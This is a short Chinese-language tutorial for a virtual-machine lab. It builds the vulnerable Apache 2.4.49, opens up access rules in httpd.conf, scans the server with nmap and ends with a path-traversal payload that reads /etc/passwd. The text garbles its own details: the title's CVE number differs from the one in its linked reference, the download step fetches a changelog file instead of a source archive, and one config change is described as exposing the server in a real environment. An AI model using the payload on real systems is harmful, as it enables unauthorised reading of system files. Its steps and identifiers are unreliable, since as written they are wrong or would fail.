这是如何利用虚拟机中的CVE-2021-4773漏洞的练习示例
本教程需要以下内容
那么让我们开始 当你有2个虚拟机在运行时,你需要通过归档仓库安装Apache 2.4.49版本 你可以在这里找到该版本: https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 第一次在你的服务器虚拟机上,需要运行以下命令
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 或 wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 第二次你需要解压这个版本的Apache,如下所示
tar -xvjf httpd-2.4.49.tar.bz2
3 安装以下软件包
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 在主目录中运行可执行文件(文件名为configure),使用标志指定安装目录
./configure --prefix=/usr/local/apache2
5 编译存在漏洞的版本
make
6 安装存在漏洞的版本
make install
7 检查版本
ls /usr/local/apache2
8 启动进程
/usr/local/apache2/bin/apachectl start
9 验证进程
ps aux | grep httpd
10 配置漏洞 找到文件 /usr/local/apache2/conf/httpd.conf 并配置目录 admin 找到标签 directory 并将 Require all denied 改为
Require all granted
找到标签 Files .ht* 将 Require all denied 改为
Require all granted
第一次更改是为了在本地环境中利用漏洞,第二次是为了在真实环境中暴露
1 使用nmap扫描IP地址,命令如下
nmap -sV IP地址
2 通过curl或get测试Apache服务器
curl IP地址 或 wget IP地址
3 如果你想要理解语法,请参考以下页面了解如何利用漏洞
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
或者直接使用以下payload
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd